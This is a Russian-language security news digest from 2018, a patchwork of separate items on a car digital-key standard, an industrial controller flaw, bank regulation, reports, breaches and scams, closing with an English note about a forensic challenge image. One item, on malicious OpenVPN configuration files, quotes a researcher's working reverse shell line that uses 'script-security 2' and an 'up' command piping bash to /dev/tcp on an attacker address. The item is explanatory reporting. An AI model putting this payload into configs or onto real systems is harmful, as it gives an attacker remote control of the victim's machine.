Технология позволит открывать двери и заводить двигатель с помощью сматрфона.
Консорциум Car Connectivity (CCC), членами которого является ряд крупнейших технологических копаний и автомобильных концернов, заявил о разработке единого стандарта технологии цифровых ключей для автомобилей.
Согласно информации из пресс-релиза, данная технология позволит открывать двери и заводить двигатель транспортного средства с помощью смартфона. Помимо этого, в технологии предусмотрена возможность идентификации пользователя, с помощью которой можно будет продать автомобиль или настроить его для совместного использования.
По словам представителей консорциума, единое технологическое решение появится в первом квартале 2019 года.
Консорциум Car Connectivity занимается разработкой глобальных стандартов и решений для подключения смартфонов и транспортных средств. В состав консорциума входят крупнейшие производители электроники Apple и Samsung, а также такие автомобильные компании, как Audi, BMW, General Motors, Hyundai и Volkswagen.
Для успешной эксплуатации уязвимости особые технические навыки не требуются.
В контроллерах Allen-Bradley CompactLogix и Compact GuardLogix от Rockwell Automation исправлена уязвимость, позволяющая удаленно вызвать отказ в обслуживании. Эксплуатация уязвимости (CVE-2017-9312) вызывает состояние Major Non-Recoverable Fault (MNRF). Данное состояние считается безопасным, однако для восстановления работы контроллеров придется заново устанавливать программное обеспечение. Для успешного осуществления атаки особые технические навыки не требуются.
Уязвимость затрагивает следующие версии продуктов:
Контроллеры Allen-Bradley CompactLogix 5370 L1 версия 30.012 и более ранние;
Контроллеры Allen-Bradley CompactLogix 5370 L2 версия 30.012 и более ранние;
Контроллеры Allen-Bradley CompactLogix 5370 L3 версия 30.012 и более ранние;
Контроллеры Allen-Bradley Armor CompactLogix 5370 L3 версия 30.012 и более ранние;
Контроллеры Allen-Bradley Compact GuardLogix 5370 версия 30.012 и более ранние;
Контроллеры Allen-Bradley Armor Compact GuardLogix 5370 версия 30.012 и более ранние.
По системе оценивания опасности CVSS v3 уязвимость получила оценку 8.6 балла из максимальных 10. Пользователям рекомендуется установить на уязвимые контроллеры версию прошивки FRN 31.011 или более позднюю.
Атакующий может превратить безопасный конфигурационный файл во вредоносный, добавив всего несколько строк кода.
Специалисты в области кибербезопасности неоднократно предупреждали о рисках загрузки контента из непроверенных источников, поскольку многие из таких файлов могут содержать вредоносный код, нежелательное рекламное ПО или скрипты, осуществляющие вредоносную деятельность на компьютере. Исследователь Джейкоб Бэйнс (Jacob Baines) продемонстрировал, как простой конфигурационный файл (.ovpn) клиента OpenVPN может использоваться для выполнения команд на компьютере после установки VPN-соединения.
Согласно Бэйнсу, для превращения безопасного конфигурационного файла во вредоносный злоумышленникам потребуется всего лишь добавить несколько строк кода. В примере исследователя, конфигурационный файл имеет следующий вид:
remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun
Если злоумышленнику требуется выполнить команду, он может добавить строку script-security 2 (разрешает OpenVPN выполнять пользовательские скрипты) и запись "up", содержащую команду, которая выполнится после установки соединения.
remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun script-security 2 up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”
Таким образом атакующий получит возможность удаленно выполнить команды на компьютере с запущенным файлом конфигурации OpenVPN.
По словам эксперта, данный метод также может использоваться для атак на пользователей компьютеров под управлением Windows с помощью скрипта PowerShell. Более подробно метод атаки описан здесь .
Хотя Бэйнс пока не сталкивался со случаями применения описанного им метода, специалист призвал с осторожностью относиться к недоверенным ovpn файлам или использовать такие OpenVPN-клиенты, как Viscosity, снижающие риск подобных атак.
OpenVPN — свободная реализация технологии виртуальной частной сети (VPN) с открытым исходным кодом для создания зашифрованных каналов типа точка-точка или сервер-клиенты между компьютерами. Она позволяет устанавливать соединения между компьютерами, находящимися за NAT и сетевым экраном, без необходимости изменения их настроек.
Банк России с 1 июля 2018 года меняет для банков – операторов по переводу денежных средств и операторов услуг платежной инфраструктуры форму отчетности о событиях, связанных с нарушением защиты информации при переводе средств. Из отчетности исключаются технические показатели, свидетельствующие о способах и причинах возникновения инцидентов в сфере кибербезопасности. При этом вводятся экономические показатели, которые характеризуют последствия этих инцидентов для операторов и их клиентов.
ФСБ России собирается внести в Уголовный кодекс, а также в Кодекс об административных правонарушениях (КоАП) определение термина «специальные технические средства, предназначенные для негласного получения информации». Сейчас в статьях законов о негласном получении информации отсутствуют какие-либо уточнения на эту тему. Уведомление о разработке соответствующих поправок ФСБ разместила на портале проектов нормативных правовых актов.
Новости ИБ
18 июня Ассоциация банков России и компания BI.ZONE, технический провайдер сервиса, запустили пилотную версию платформы обмена данными о киберугрозах. В числе первых к пилотному проекту присоединился Сбербанк, а также Саровбизнесбанк и банк «Кубань кредит». Инновационная платформа обеспечит компаниям оперативный доступ к наиболее актуальным данным по киберугрозам, в том числе индикаторам компрометации.
Из официального реестра Docker Hub были удалены сразу 17 образов контейнеров, содержавших бэкдоры. Через них на серверы пользователей проникали майнеры и обратные шеллы. Образы были активны с мая 2017 года по май 2018 года, после чего все же были замечены ИБ-экспертами.
Cisco исправила уязвимость в одном из компонентов Secure Access Control System (ACS). Через эту брешь злоумышленник мог обойти систему аутентификации программы и удаленно выполнить произвольный код на сетевом устройстве. Продукт уже снят с продажи, однако производитель пропатчил баг и выпустил внеочередное обновление системы.
Разработчики Microsoft выпустили исправления более чем для 50 уязвимостей в Windows, Internet Explorer, Microsoft Edge, ChakraCore, а также Microsoft Office и Microsoft Office Services. Кроме того, в состав июньского «вторника обновлений» вошли патчи для проблемы Spectre вариант 4.
Cisco открыла сетевое программное обеспечение для автоматизации и анализа DNA Center для всех желающих. Разработчики получат доступ к более чем 100 API. DNA Center упрощает автоматизацию сетей при помощи подхода на основе намерений (intent based), что помогает автоматически определять, какие политики применяются к тому или иному устройству. Самым большим преимуществом для большинства системных администраторов, вероятно, будет встроенная система безопасности, которая автоматически обнаруживает нестандартное поведение.
Сводная группа исследователей из Университета Калифорнии в Риверсайде, Колледжа Вильгельма и Марии, а также Бингемтонского университета представила доклад о технике SafeSpec, которая позволит бороться с рисками, связанным со спекулятивным исполнением команд, и атаками на такие уязвимости, как Spectre и Meltdown.
Сбербанк фиксирует 8-9 тыс. атак на своих клиентов в неделю со стороны кибермошенников, которые пытаются вывести деньги. По словам зампреда правления Сбербанка Станислава Кузнецова, динамика количества атак, к сожалению, растет. Также изменился характер атак, злоумышленники уже пытаются не просто остановить работу компаний, но тестировать возможности защиты и технологий для последующих технологических прорывов.
Немецкий электротехнический концерн Phoenix Contact опубликовал информацию о наличии четырех уязвимостей в промышленных коммутаторах серии FL SWITCH. Устройства используются для выполнения задач автоматизации на цифровых подстанциях, в нефтегазовой, морской и других отраслях. Злоумышленник может нарушить технологический процесс, отключив критически важное оборудование от промышленной сети.
Минфин США ввел санкции в отношении трех российских структур и двух связанных с одной из них компаний, базирующихся за рубежом. Причиной послужило их сотрудничество с Федеральной службой безопасности (ФСБ). В черные списки попала имеющая офисы в Москве и Санкт-Петербурге консалтинговая компания Digital Security. Помимо нее самой, санкции затронули подконтрольные ей структуры: Embedi, работающую в Израиле, и Erpscan.
Интересные посты англоязычных блогов по ИБ
Charles Goldberg поделился своими впечатлениями от конференции Gartner Security & Risk Management Summit в Вашингтоне. Автор заметил, что в этом году больше внимания уделяется возвращению к основам, нежели таким горячим темам, как IoT, Blockchain и «Цифровая трансформация». В отличие от прошлого года, в этот раз эти громкие темы были включены в более общие секции лучших практик.
Авторы данной статьи объясняют, почему невозможно автоматизировать программы повышения осведомленности по безопасности. Это тот миф, в который продавцы решений хотят заставить нас верить. По мнению авторов, невозможно автоматизировать логическое мышление и умение рассуждать. Осведомленность требует знания культуры компании и осознанности, строится на отношениях между людьми и решении повседневных проблем.
Недавно ученые из New York Institute of Technology и Stevens Institute of Technology опубликовали статью об использовании относительно новой техники машинного обучения, которая позволяет на 18-24 % лучше угадывать пароли. Под угадыванием подразумевается взлом хэшей паролей в автономном режиме. В данной статье объясняется, как работает эта технология, для чего она может быть использована преступниками, какие меры защиты предпринять пользователям и руководителям служб безопасности.
В блоге Infosec Institute представлен краткий обзор ТОП-15 книг, обязательных для специалистов по информационной безопасности разного уровня квалификации. Они также подойдут для людей, готовящихся к карьере в области ИБ. И хотя некоторые из них были написаны несколько лет назад, они по-прежнему являются избранными книгами многих профессионалов и студентов.
Интересные посты русскоязычных блогов по ИБ
На Хабрахабре появилась статья, где приведен анализ систем обнаружения вторжений (IDS), принципы функционирования и анализ атак, а также краткое исследование работ в области нейросетевых решений. Автором сделана попытка разработки модуля для обнаружения аномалий в сети на основе нейросетевого метода анализа сетевой активности и проанализированы результаты проделанной работы.
Алексей Лукацкий посвятил пост рассмотрению конкуренции между двумя основными банками страны — Сбербанком и Банком России. Алексей попробовал составить некоторые ключевые вехи, которые в разное время звучали из уст представителей двух финансовых организаций. Эти банки идут в ногу, занимаясь общим и важным для финансовой отрасли делом — повышением ее кибербезопасности. В результате получается здоровая конкуренция, которая движет рынок вперед.
Андрей Прозоров поделился списком и ссылками на Supervisory Authority (надзорный орган по GDPR) в разных странах ЕС. Некоторые из перечисленных органов публикуют полезные комментарии и рекомендации по соблюдению GDPR. Автор изучил и прокомментировал доступные ресурсы этих органов.
Исследования и аналитика
Лаборатория Касперского провела исследование взлома национального ЦОД в Центральной Азии. Как полагают специалисты, основной целью хакеров стала подготовка плацдарма для кибератак на правительственные web-сайты страны. За кампанией против национального дата-центра стоит китаеязычная группа LuckyMouse (также известная как EmissaryPanda и APT27).
Исследование компании BeyondTrust показывает, что 90 % предприятий используют по крайней мере одну из технологий следующего поколения (NGT) — облака, IoT или AI. При этом 78 % видят огромные риски безопасности, связанные с этими технологиями. Каждый пятый респондент столкнулся с пятью или более нарушениями, связанными с NGT. Чрезмерные привилегии пользователей оказались причиной инцидентов в 52 % случаев.
По данным Nexusguard, DDoS-атаки типа усиления DNS в первом квартале 2018 года удвоились по сравнению с прошлым кварталом и выросли почти на 700 % в годовом исчислении. Согласно отчету Q1 2018 Threat Report, уязвимые Memcached серверы представляют значительный риск, если они не настроены должным образом.
Согласно отчету Positive Technologies, используя недостатки протокола Diameter, злоумышленник может лишить абонентов основных преимуществ 4G — высокой скорости и качества связи. Уязвимости протокола Diameter могут привести к блокировке работы банкоматов, POS-терминалов, приборов учета ЖКХ, автосигнализаций, а также систем видеонаблюдения.
Специалисты Positive Technologies подготовили статистику по уязвимостям, обнаруженным в ходе проведения работ по тестированию безопасности веб-приложений. По результатам анализа было установлено, что злоумышленники могут получить персональные данные в 44% систем, в которых осуществляется их обработка. Речь идет, среди прочего, о финансовых учреждениях, интернет-магазинах и телекоммуникационных компаниях. При этом доля приложений, для которых существует угроза утечки критически важной информации, составляет 70%.
Специалисты Positive Technologies проанализировали данные за первый квартал 2018 года и отметили рост числа киберинцидентов на 32% по сравнению с аналогичным периодом прошлого года, а также использование вредоносного ПО в большинстве атак. Согласно отчету, в I квартале текущего года существенно выросла (на 13% по сравнению со средним показателем за 2017 год) доля атак, нацеленных на получение данных: это преимущественно персональные данные, а также учетные записи и пароли.
Компания SAP выпустила очередной пакет ежемесячных исправлений, в котором закрыла десять уязвимостей своих продуктов. В их числе две критические бреши, четыре ошибки с высокой степенью опасности и четыре умеренные угрозы. Два апдейта закрыли уязвимости, связанные с проблемой безопасности встроенного веб-браузера и возможностью инъекции для отправки операционной системе несанкционированных команд. Бреши были обнаружены в продуктах SAP Business Client и SAP BASIS.
Palo Alto Networks раскрыла некоторые статистические данные по фишингу в первом квартале 2018 года, особенно для фишинговых HTTPS-адресов. Согласно отчету, в первом квартале было найдено 4 213 адресов из 262 уникальных доменов, используемых в фишинговых атаках. Более половины этих фишинговых доменов были размещены в США, на втором месте –Германия, на третьем – Польша.
Аналитики McAfee Advanced Threat Research team опубликовали отчет McAfee Blockchain Threat, в котором описаны текущие угрозы в отношении пользователей и разработчиков блокчейн-технологий. Злоумышленники используют множество методов, нацеленных на потребителей и предприятия. Основные векторы атак включают фишинг, вредоносные программы, эксплуатацию уязвимостей и технологичные атаки.
Trend Micro выявили тенденции в ландшафте угроз и нарисовали картину основных типов угроз по данным из Trend Micro™ Smart Protection Network™ в Северной Америке за 1 квартале 2018 года. Согласно отчету, основными угрозами остаются похищение данных, вымогатели и майнеры криптовалют. В качестве вывода отчета выделена важность реализации упреждающей стратегии реагирования на инциденты, включая обнаружение угроз и возможности реагирования на инциденты.
Специалисты Digital Security провели анализ безопасности компонентов Microsoft Office с целью повышения компетентности внутренних служб безопасности компаний и обычных пользователей. В рамках проекта был проведен анализ внутреннего устройства ПО, архитектурных особенностей, технологий и их недостатков. Были рассмотрены следующие ключевые блоки: закрытые технологии, COM-технологии, расширения, централизованное конфигурирование и администрирование, шифрование, определение векторов атаки на приложения/компоненты Microsoft Office.
Громкие инциденты ИБ
Установочная программа клиента Syscoin для Windows версии 3.0.4.1 содержала вирус и была загружена на Github хакером, который взломал аккаунт одного из разработчиков. Об этом рассказали представители стартапа. Пользователи, которые скачивали программу с 6 по 13 июня, могут потерять свои средства.
Выявлена фишинговая кампания, связанная с началом Чемпионата мира по футболу 2018. Кибермошенники рассылают зараженный файл под видом расписания игр и турнирной таблицы. Как сообщают эксперты Check Point Software Technologies, во вложении фишинговых писем скрывается вредоносное ПО под названием «DownloaderGuide», который известен как загрузчик потенциально нежелательных программ.
Мошенники воспользовались брендом «Четвертого канала», устроив массовую атаку на сайт телекомпании. Ситуация в Екатеринбурге возникла утром 18 июня, когда на телефонные номера множества горожан и компаний поступили анонимные звонки с предложением принять участие в опросе по теме повышения пенсионного возраста. Сайт телекомпании, набрав 8 миллионов посещений, рухнул.
Хакеры похитили криптовалюту на $32 млн с одной из крупнейших криптовалютных бирж Южной Кореи Bithumb. В результате ограбления криптовалютная биржа приостановила деятельность. Пострадавшим пообещали компенсировать ущерб.
Программа похищает информацию об устройстве, включая номер телефона, IMEI, данные о модели, производителе, местоположении и пр.
Исследователи безопасности из фирмы RiskIQ обнаружили вредоносную кампанию, ориентированную на пользователей Android-устройств. Программа для хищения данных, размещенная в Google Play Store, замаскирована под приложение для уменьшения расхода заряда батареи.
Android-приложение под названием Advanced Battery Saver после установки действительно уменьшает расход заряда, увеличивает время работы и закрывает ненужные сторонние приложения. Однако, по словам исследователей, приложение также получает разрешение на доступ к конфиденциальным данным журнала, получение SMS-сообщений и полный доступ к сети.
Помимо этого, в фоновом режиме программа показывает рекламу, обманом заставляя пользователей нажимать на объявления и ссылки, а также собирает информацию об устройстве, включая номер телефона, IMEI, данные о модели, производителе, местоположении и пр.
В настоящее время вредоносное приложение Advanced Battery Saver загрузило более 50 тыс. пользователей по всему миру.
Исследователи попытались установить личность автора вредоносного ПО на основе адреса электронной почты, доступного в разделе дополнительной информации приложения, и выяснили, что тот же разработчик также загрузил связанное с криптовалютой приложение в Play Store, которое на момент публикации данной новости уже удалено.
Мошенники рассылают письма с сообщением о том, что устройства жертв были заражены новой версией WannaCry, и требуют выкуп.
Утром в четверг, 21 июня, Великобританию захлестнула волна фишинговых писем, сообщающих о возвращении печально известного шифровальщика WannaCry.
В письме жертве сообщается о том, что все ее устройства были взломаны и заражены новой, еще более опасной версией WannaCry. Зашифрованные новой версией вредоноса файлы якобы не подлежат восстановлению, и если жертва не хочет потерять их навсегда, она должна заплатить вымогателям 0,1 биткойна.
Если выкуп не будет уплачен до 17:00 22 июня, «все данные, хранящиеся на компьютерах, серверах и мобильных устройствах будут уничтожены». После уплаты выкупа вымогатели обещают предоставить жертве инструкции по удалению вредоноса. Если жертва попытается избавиться от него самостоятельно, «удаление данных начнется незамедлительно».
Согласно письму, шифровальщик не детектируется антивирусным ПО, обходит межсетевые экраны и работает на устройствах под управлением всех версий Windows, Linux, macOS, iOS и Android. Вредонос способен автоматически распространяться по локальной сети и заражать все подключенные к ней устройства.
По данным The Register, содержание письма – чистой воды вымысел с целью вызвать панику среди пользователей и заставить их платить за несуществующую угрозу. Не похоже, чтобы пользователи поверили фишерам – по состоянию на 21 июня указанный ими в письме криптовалютный кошелек был пуст.
Законопроект 6688 дает право блокировать сайты по решению следователя или прокурора.
В четверг, 21 июня, депутаты Верховной Рады Украины в очередной раз рассмотрели законопроект о возможности блокировки сайтов без решения суда. За принятие документа проголосовали 238 депутатов при минимально необходимых 226, сообщает ukranews.com.
Законопроект 6688 дает право временно блокировать сайты по решению следственного судьи, следователя, прокурора или Совета национальной безопасности и обороны. Вооружившись таким решением, Служба безопасности Украины сможет обращаться напрямую к провайдерам с требованием заблокировать ресурс, потенциально представляющий угрозу национальной безопасности. Угрозой может считаться попытка оказать давление на органы власти, устрашение населения, провокация военного конфликта, а также привлечение внимания к религиозным и политическим взглядам террористов.
За первый отказ выполнять требование СБУ провайдер будет вынужден заплатить штраф в размере 1% от годового дохода. При повторном отказе сумма штрафа увеличивается до 5%.
Как сообщается в пояснительной записке к документу, ресурсы можно будет блокировать временно, для отражения кибератак. Для этого в УК Украины нужно добавить ст. 213-1 «Временная блокировка доступа к определенному ресурсу в информационно-коммуникационных системах». Покупка необходимого для осуществления блокировок оборудования ложится на плечи самих провайдеров.
Законопроект был направлен на рассмотрение в Верховную Раду еще в июле прошлого года, но до сих пор не включался в повестку дня.
Исследователи из Imperva выявили киберкампанию, авторы которой оставляют на WordPress-сайтах приманки для привлечения визитеров на мошеннические площадки, сулящие бесплатный просмотр популярных фильмов в жанре экшн.
По свидетельству экспертов, взломщики создали целую сеть из угнанных сайтов, которые они наполняют своим контентом — JavaScript-редиректорами и фальшивыми видеороликами. Трафик на этих сайтах создается за счет переманивания чужих посетителей: используя уязвимость в API WordPress, мошенники подменяют содержимое сайтов своей приманкой — приглашением к просмотру с привлекательной картинкой и ссылкой.
Заплатка для упомянутой бреши появилась в марте прошлого года, разработчики включили ее в состав WordPress 4.7.3. Поскольку далеко не все владельцы сайтов регулярно устанавливают обновления, многие из них до сих пор используют устаревшие, уязвимые версии CMS.
Пройдя по указанной ссылке, посетитель попадает на мошеннический сайт. Далее в зависимости от содержимого его могут перенаправить на теневую площадку партнеров либо пригласить перейти на страницу с видеороликом. Во втором случае при попытке посмотреть “боевик” пользователь обнаруживает, что для этого нужна регистрация.
Как выяснили в Imperva, оформление подписки на этом сайте — фикция: после ввода логина и пароля через 3-5 секунд появляется сообщение, что они неверны. При этом регистрационные данные даже не передаются на сервер для проверки, просто при вводе автоматически отрабатывает JavaScript. Если посетитель пытается создать “бесплатный аккаунт”, его перенаправляют на сомнительный сайт с рекламой услуг или поддельный платежный сервис PayPal.
Список роликов, предлагаемых мошенниками для просмотра, в основном составляют экшн-фильмы для детей и подростков. По всей видимости, аферисты решили, что такая аудитория скорее попадется на крючок. Правда, наличие в мошеннической сети сайтов, имитирующих PayPal или просто запрашивающих данные кредитных карт, говорит о том, что схема рассчитана также на взрослых, которые захотят порадовать своих чад семейным просмотром. Не исключено также, что злоумышленники выбирали названия фильмов наугад — лишь бы щедро разбросанные приманки работали и приносили доход.
Подавляющее большинство наблюдаемых атак, по словам исследователей, исходит с IP-адресов совместного хостинга с большим количеством панелей управления CPanel. На радарах Imperva засветились также IP индонезийского оператора сотовой связи; эксперты предположили, что организаторы мошеннической схемы проводили тестирование на дому и оттуда же удаленно корректируют атаки.
Hello Reader,
If you watched last Friday's Forensic Lunch you would have heard that we are releasing the forensic image we used for the Magnet User Summit challenge so you can try it for yourself.
Here is the a dropbox link to the images: https://www.dropbox.com/sh/85v4wsawyijxd9r/AAAa75lptg8oF0tpO2zPnXSna?dl=0
Download the images and we are going to work on getting the scoreboard open so you can see the questions and attempt to get a perfect score.
